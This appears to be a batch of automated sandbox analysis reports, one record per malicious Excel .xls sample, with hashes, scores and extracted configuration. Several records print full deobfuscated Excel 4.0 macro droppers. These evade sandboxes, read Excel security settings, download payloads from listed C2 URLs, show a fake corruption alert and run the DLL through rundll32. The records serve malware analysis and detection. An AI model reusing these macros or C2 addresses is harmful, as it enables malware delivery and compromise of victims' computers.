{"version":"0.2","sample":{"sample":"","kind":"file","target":"8b207b497dd087eec42d79081e99c3ead65b36b0a8d7525b73ed347058d13b4e"},"analysis":{"reported":"2020-04-09T16:17:33Z","score":10},"files":[{"filename":"8b207b497dd087eec42d79081e99c3ead65b36b0a8d7525b73ed347058d13b4e","filesize":104448,"md5":"c685a92ed6fe521084bd8d09945888d8","sha1":"aa8f20a6429fe9d432385b3e52e3f2751fad4964","sha256":"8b207b497dd087eec42d79081e99c3ead65b36b0a8d7525b73ed347058d13b4e","sha512":"e69e2eb602da166e2d59765fee3e0717026112ecabc6a177524ebff688b1cbce3ce6c9aa668d2da2e05e404fe20e362584bb9176cb1d603822a329dffc4a1cf7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8b207b497dd087eec42d79081e99c3ead65b36b0a8d7525b73ed347058d13b4e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"3Zcik0xhoG\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8b20d287a5701976b8f03d4dd69a3ce46d452398fdf13001cd576523a216b71a"},"analysis":{"reported":"2020-04-09T16:17:33Z","score":10},"files":[{"filename":"8b20d287a5701976b8f03d4dd69a3ce46d452398fdf13001cd576523a216b71a","filesize":209920,"md5":"d77378c5886c975906121bc7ecc7f912","sha1":"124ce984db6a87a7975870238d9e8e585bda242d","sha256":"8b20d287a5701976b8f03d4dd69a3ce46d452398fdf13001cd576523a216b71a","sha512":"445c8d721dd07ee3c7aa8098b1334e56c08105317b3eb44207ffba4c5fc9c6efb1c9ba325df2365aee22fd6c96cc5ca903e1332f5da07ec0d2d1595ff6cf580b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8b20d287a5701976b8f03d4dd69a3ce46d452398fdf13001cd576523a216b71a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"NYu4ih63Lh\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8b356f720c8911ef28d5d7bbd7d06694a8f0ce432f3aae5e60a62c6e22887596"},"analysis":{"reported":"2020-04-09T16:17:33Z","score":10},"files":[{"filename":"8b356f720c8911ef28d5d7bbd7d06694a8f0ce432f3aae5e60a62c6e22887596","filesize":209920,"md5":"2baf3bb1867db00b8e916a907045b25a","sha1":"dd3fddeb4f79b1a7533644dac5510708b942ac2d","sha256":"8b356f720c8911ef28d5d7bbd7d06694a8f0ce432f3aae5e60a62c6e22887596","sha512":"714d68c45f892a2b04c41ac9d8828d82248684b83b6392b124cd79f9a39c34e13fa4ce08b58e783f1556c23963a5d429db65a0b2575e0e1349c266a272ddf816","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8b356f720c8911ef28d5d7bbd7d06694a8f0ce432f3aae5e60a62c6e22887596.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"isReEkgFok\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8b36777f34613977aef8b0949f16caf052bc460dc5f4f8e9253909ada32b235b"},"analysis":{"reported":"2020-04-09T16:17:33Z","score":10},"files":[{"filename":"8b36777f34613977aef8b0949f16caf052bc460dc5f4f8e9253909ada32b235b","filesize":167936,"md5":"accdd1113316e060487305efff0e722c","sha1":"9d981d8cf478dabf9ca66e53ec93cc7372878eaa","sha256":"8b36777f34613977aef8b0949f16caf052bc460dc5f4f8e9253909ada32b235b","sha512":"ae9c5e21ed1123834d31a1e4cf73aac2127143ab314c37e922d174e121c639fc8d760d8d2b42ac89f96a4c89072a9adb40f054ef07eabbf6c1438511dd81da75","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8b36777f34613977aef8b0949f16caf052bc460dc5f4f8e9253909ada32b235b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"TEb0IZe8St\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8b5a17feb10ce8dac6126ebe629fad873ace61460e89b18f4b5edc1067c7b60c"},"analysis":{"reported":"2020-04-09T16:17:33Z","score":10},"files":[{"filename":"8b5a17feb10ce8dac6126ebe629fad873ace61460e89b18f4b5edc1067c7b60c","filesize":71680,"md5":"053cf445ec2db3dd28a985fdaf505ccb","sha1":"03e822f96923dc3ae907b826f3d7a52515470153","sha256":"8b5a17feb10ce8dac6126ebe629fad873ace61460e89b18f4b5edc1067c7b60c","sha512":"9aba4d2eabf337eaa7061ee39004784d945d627c03ec0045152889bfce25069ee41a55a02e885b5f648a374dbd6f16885398e4987a1523a0b60d4c8cd84cb6a4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8b5a17feb10ce8dac6126ebe629fad873ace61460e89b18f4b5edc1067c7b60c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"SUM(R$22C$3)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8b5a79c3b7fb3f3577447fc4b34dac8610342002aa8cb6edaa510e65c8ded0da"},"analysis":{"reported":"2020-04-09T16:17:33Z","score":10},"files":[{"filename":"8b5a79c3b7fb3f3577447fc4b34dac8610342002aa8cb6edaa510e65c8ded0da","filesize":144384,"md5":"35147a7da4d8691c252df10f811842ca","sha1":"968b07b4d43ef915f258fb0c44fc2949cb53526f","sha256":"8b5a79c3b7fb3f3577447fc4b34dac8610342002aa8cb6edaa510e65c8ded0da","sha512":"9be0d3e41d6a49896fefc395e356d317573de3f3157f1959997864493de81b3246ff2d1f83d06bd5b3a454d0c06df131189c7625d2817155de7bc8a2b21ca299","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8b5a79c3b7fb3f3577447fc4b34dac8610342002aa8cb6edaa510e65c8ded0da.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"iNP6flQTQV\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8b674e3057ac1ef70e1815a7a71f1eaba07df2dbafdb730ef45423299f4f922f"},"analysis":{"reported":"2020-04-09T16:17:33Z","score":10},"files":[{"filename":"8b674e3057ac1ef70e1815a7a71f1eaba07df2dbafdb730ef45423299f4f922f","filesize":160768,"md5":"7334b17704948fdb9712f26f6f01bcd0","sha1":"52bc0b0ca4aa88000220627d150b4996e4a2bdc0","sha256":"8b674e3057ac1ef70e1815a7a71f1eaba07df2dbafdb730ef45423299f4f922f","sha512":"3c6f150354d99459d44c625ddcb50734ed0917acd748312100bc44c236a1dcf2894f03b5c20e52248b6ed57f3679835e78c68313c5c2e789cf44fa479610a20a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8b674e3057ac1ef70e1815a7a71f1eaba07df2dbafdb730ef45423299f4f922f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"3LMDG40RDl\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8b6a90f291b1b4c006b2d55285d050326847e4ae4d922964ddbf74ee372d596c"},"analysis":{"reported":"2020-04-09T16:17:33Z","score":10},"files":[{"filename":"8b6a90f291b1b4c006b2d55285d050326847e4ae4d922964ddbf74ee372d596c","filesize":185344,"md5":"7612210aecfa78d0380f45654f1c0236","sha1":"c4127c0f06cc43cf33b05e397211cbd0d013ab17","sha256":"8b6a90f291b1b4c006b2d55285d050326847e4ae4d922964ddbf74ee372d596c","sha512":"3ece3763ac1b2147d69afaaac6cbf822fa08d89bdfe01f6a7c2b4ad46e8d9de94277ee6fa21a4acd62078b54ac97838a7a1846fee7172ef2c6311bfc436138cf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8b6a90f291b1b4c006b2d55285d050326847e4ae4d922964ddbf74ee372d596c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8b6ae737c826d722d5147a5e481fe4fe824452ffb079a3767188cee38e48e6b6"},"analysis":{"reported":"2020-04-09T16:17:33Z","score":10},"files":[{"filename":"8b6ae737c826d722d5147a5e481fe4fe824452ffb079a3767188cee38e48e6b6","filesize":144384,"md5":"087e95f7609811e460098018eeca6ae8","sha1":"6bd7210eb6933cef81f6fca9332144a8ef8e9a7b","sha256":"8b6ae737c826d722d5147a5e481fe4fe824452ffb079a3767188cee38e48e6b6","sha512":"6337ffbb5a1f9893e167c92ee197ea6ba552f612953d0d037753b1eeb0266f9977f6cd209fffe5821aef172394205c9c7a67e0455dd989f2c553e384ffdd9f6d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8b6ae737c826d722d5147a5e481fe4fe824452ffb079a3767188cee38e48e6b6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"IoOHcfAKeW\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8b6b9d70cd8f693d751269934e53e3e88d68a1ccdfdf03a4f96ae723de56d838"},"analysis":{"reported":"2020-04-09T16:17:33Z","score":10},"files":[{"filename":"8b6b9d70cd8f693d751269934e53e3e88d68a1ccdfdf03a4f96ae723de56d838","filesize":221184,"md5":"6c528d23dfcfeb0ef4b4f1b7b2343262","sha1":"953a970bff16f8e6beca67db3b1fa048ed957adf","sha256":"8b6b9d70cd8f693d751269934e53e3e88d68a1ccdfdf03a4f96ae723de56d838","sha512":"b74f2189d3d11974125804085aec83eb41a3570c8d461f44f6022221387047a68292b909136762c24328e7961f3a415ff31c5452c1de0d7415c4f138cf141b6d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8b6b9d70cd8f693d751269934e53e3e88d68a1ccdfdf03a4f96ae723de56d838.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"FndLMzKskT\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8b704bd6626d152092ed3d5cabdce33425b85498cdb7b4978457113d77de2364"},"analysis":{"reported":"2020-04-09T16:17:33Z","score":10},"files":[{"filename":"8b704bd6626d152092ed3d5cabdce33425b85498cdb7b4978457113d77de2364","filesize":99840,"md5":"c31fc66af773794fc1e142bd4d063af2","sha1":"a3f207ca9a1449a560a8007d9df74cd371aac3aa","sha256":"8b704bd6626d152092ed3d5cabdce33425b85498cdb7b4978457113d77de2364","sha512":"251d56f7228a0ac6355f32a8c9f35b71903823abcf835515e36a4c2b96e74e34752ab1d3c026a559cc2ce9d0d90243e26e9a392f099b7cd814a6b8fdce70220f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8b704bd6626d152092ed3d5cabdce33425b85498cdb7b4978457113d77de2364.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://209.141.54.161/files/crypt.dl"],"attr":{"formulas":"CALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\plZtkbp\",0)\nCALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\plZtkbp\\ziiVIiF\",0)\nCALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://209.141.54.161/files/crypt.dl\",\"C:\\plZtkbp\\ziiVIiF\\SgNeRVu.dll\",0,0)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCCJ\",0,\"Open\",\"rundll32.exe\",\"C:\\plZtkbp\\ziiVIiF\\SgNeRVu.dll DllRegisterServer\",0,0)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8b756833f8ed14d4af766430a26a72760b7b6cf1b4e23de888cdcef75d560f1e"},"analysis":{"reported":"2020-04-09T16:17:33Z","score":10},"files":[{"filename":"8b756833f8ed14d4af766430a26a72760b7b6cf1b4e23de888cdcef75d560f1e","filesize":185344,"md5":"5aabc2c1f651dbb139020b3b3e942719","sha1":"e48a8a68e83da495f9349932b70bf0997e0b2987","sha256":"8b756833f8ed14d4af766430a26a72760b7b6cf1b4e23de888cdcef75d560f1e","sha512":"d38aa5726d35609d9380841397162b56da30b8b6a856242075aa0d20dcdb3e802319fb368cb112879443020588617cce9825f599d2a12294dc747959e8916d78","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8b756833f8ed14d4af766430a26a72760b7b6cf1b4e23de888cdcef75d560f1e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8b8ac72edc4d48eeef95fc8dad1a862a52fefc1336e6475b7bbba31a5d0ca0d4"},"analysis":{"reported":"2020-04-09T16:17:33Z","score":10},"files":[{"filename":"8b8ac72edc4d48eeef95fc8dad1a862a52fefc1336e6475b7bbba31a5d0ca0d4","filesize":144384,"md5":"7436b5e0690819bebc7d3d78c35cd69a","sha1":"f82b590e8703bf34a5934e5086025b4c238f06ec","sha256":"8b8ac72edc4d48eeef95fc8dad1a862a52fefc1336e6475b7bbba31a5d0ca0d4","sha512":"84a099f64fa9ea3e711bdc6029b5c548ab7841e5ef0a2ea9df1d10e2528b50fbb0583b4e8d64a5d4ca38c3afe38e9459c0102360c8f387d7921263aeb6b64b15","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8b8ac72edc4d48eeef95fc8dad1a862a52fefc1336e6475b7bbba31a5d0ca0d4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"QD3iwNEBfT\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8b8e710e7de4f8e0a913365cc8a74d530e0d7a2407bbffb02959d708bfddd204"},"analysis":{"reported":"2020-04-09T16:17:33Z","score":10},"files":[{"filename":"8b8e710e7de4f8e0a913365cc8a74d530e0d7a2407bbffb02959d708bfddd204","filesize":145920,"md5":"51d27607feef226b58e6bed9d734f1d9","sha1":"a5280897c77881e11046b1dc000c4ac4cd441275","sha256":"8b8e710e7de4f8e0a913365cc8a74d530e0d7a2407bbffb02959d708bfddd204","sha512":"ecff5135065f4b6e1b352df03332fb06bb1b86c9b2cc9551e4ea2438d6cd9dd76b76e2b70cb71a9fa649c610ec30cf169a9588bdad48e3c32e9866d0a2c2055b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8b8e710e7de4f8e0a913365cc8a74d530e0d7a2407bbffb02959d708bfddd204.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://uenoeakd.site/grwrg24g2g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"V25ebQqy0s\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8b934a665f0c0add13e59c21718966a5c376ce4c0b8559116ac392eccfee514c"},"analysis":{"reported":"2020-04-09T16:17:33Z","score":10},"files":[{"filename":"8b934a665f0c0add13e59c21718966a5c376ce4c0b8559116ac392eccfee514c","filesize":185344,"md5":"defd9150595ee77ca973d7670b817fac","sha1":"d240898d023d7c07a3c82ae5f71cb5d644646438","sha256":"8b934a665f0c0add13e59c21718966a5c376ce4c0b8559116ac392eccfee514c","sha512":"8e24cb82b539831fa1fdf071fd688160873ea6d42dca258f2ffa8a81857d4fc4a14141872ff0fcba080da5be610c7fc597ed5a8b8970ebbfb40db1ec8d30e992","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8b934a665f0c0add13e59c21718966a5c376ce4c0b8559116ac392eccfee514c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8ba3e38b12606b411cbdf8412ffdff396b568f14eb7f393610c889fb3164e99a"},"analysis":{"reported":"2020-04-09T16:17:33Z","score":10},"files":[{"filename":"8ba3e38b12606b411cbdf8412ffdff396b568f14eb7f393610c889fb3164e99a","filesize":185344,"md5":"70a839e77ea991402ca51c7876e076ae","sha1":"dd0769fc32ff878744771d0e0b26427b2e70bd43","sha256":"8ba3e38b12606b411cbdf8412ffdff396b568f14eb7f393610c889fb3164e99a","sha512":"f7f2cff344baa5df82a9f319d907f102e21223c3ebf982553533cd8839133dd5bd14c40970a651afbdfc0cad8d8c4bd4794648be1ef25c1eaaca09349235535c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8ba3e38b12606b411cbdf8412ffdff396b568f14eb7f393610c889fb3164e99a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8bc2fc022b7888d779eb32499f615e2b21e335d66a674ccc758547613395125a"},"analysis":{"reported":"2020-04-09T16:17:33Z","score":10},"files":[{"filename":"8bc2fc022b7888d779eb32499f615e2b21e335d66a674ccc758547613395125a","filesize":209408,"md5":"8d93171d3004ce796d66e304d93acf5b","sha1":"484200776e1b57f891fd22261a6e9ae3eb569395","sha256":"8bc2fc022b7888d779eb32499f615e2b21e335d66a674ccc758547613395125a","sha512":"1e1d37591af47a53723e79db11c27cb0179ef368b393ef5ce99e82757e556593231c369a3283f34a6a83a96c17abb052cbffc34e3b6596162c3ce85fe91c10a3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8bc2fc022b7888d779eb32499f615e2b21e335d66a674ccc758547613395125a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"9OL63pBcvX\",TRUE)\nGOTO(R$1C$10)"}}}]}
